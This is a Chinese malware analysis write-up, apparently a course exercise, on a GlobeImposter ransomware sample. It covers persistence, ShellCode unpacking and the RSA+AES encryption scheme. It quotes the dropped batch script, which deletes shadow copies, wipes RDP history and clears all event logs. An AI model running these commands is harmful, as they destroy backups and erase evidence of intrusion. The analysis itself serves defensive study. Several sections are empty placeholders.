一.样本概况
1、样本信息
样本来源:http://www.malware-traffic-analysis.net/2017/12/04/index.html
Kaspersky,NOD32,360均报毒:
MD5: 2908715EEC754ABA1AD21414B23CAFB6
SHA1: 4AF27F4B95F29F877D0ABB1167E6B1148C1849BD
CRC32: 64CAEB77
2、测试环境及工具
系统环境:win7_7600_x86
工具:
3、病毒行为
进行勒索:
文件加密:
文件加密为.doc后缀。
删除键值项:
二、具体行为分析
1、特征
Globlemposter家族病毒有两个主要的特征:
ShellCode执行和 PE文件释放执行。
1.1、拷贝执行ShellCode
内部采用TEA算法加密ShellCode:
1.2、Pe文件释放执行
Dump下来的ShellCode,修改0x400000属性为可执行,并释放了PE文件,跳到OEP执行。
2、行为
把PE文件 dump下来分析,先列出其它行为。
2.1、修改注册表 开机启动
复制文件,目录:C:\Users\15pb-win7\AppData\Roaming\PE.exe
设置启动项,键值:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\BrowserUpdateCheck
1.2、创建.bat文件删除信息
在Temp目录下创建.bat文件,运行.bat文件分别删除卷影、RDP连接历史记录、日志信息。
@echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
2.3、自删除
cmd 执行 /c del C:\Users\15pb-win7\Desktop\PE.exe 自删除。
3、文件加密
勒索病毒重点在于加密文件,所以重点对加密文件流程进行分析。
3.1、加密方式
病毒采用的是RSA+AES的加密方式。
一般RSA与AES结合:
病毒变相的RSA与AES结合:
共有两对RSA公私钥:hac_pri 和 hac_pub,user_pri 和 user_pub。
加密文件的AES密钥。
用户ID:包含user_pri。
secret_Ekey:包含secret_key,跟解密的AES有关。
解密过程:
黑客拿到文件后,可以提取 用户ID 和 secret_Ekey。用自身的hac_pri解密用户ID得到user_pri。再用user_pri解密secret_Ekey得到secret_key。
计算文件的IV参数,结合secret_key计算即可得到AES密钥,用以解密文件。
3.2、用户ID生成
hack_pub加密成哈希值生成用户ID,并做为FileName,创建文件在目录下。
目录:C:\Users\Public\AE09C984DF6E74640B3271EADB5DD7C65FDE806235B2CDA478E0EFA9129C09E7
哈希值:AE 09 C9 84 DF 6E 74 64 0B 32 71 EA DB 5D D7 C6 5F DE 80 62 35 B2 CD A4 78 E0 EF A9 12 9C 09 E7
hack_pub:
加密成hash:
创建文件:
3.3、加密文件
创建线程加密文件:
遍历文件:
IV参数:
AES密钥:
加密 secret_key,并将 secret_Ekey 和 用户ID 写进文件。
三、恶意程序对用户造成的危害
四、解决方案(或总结)
3.1 提取病毒的特征,利用杀毒软件查杀
特征包括:网络ip,字符串等等
3.2 手工查杀步骤或是工具查杀步骤或是查杀思路等。
参考文献
致谢
15pb全体教师,以及教导我的所有人。
KID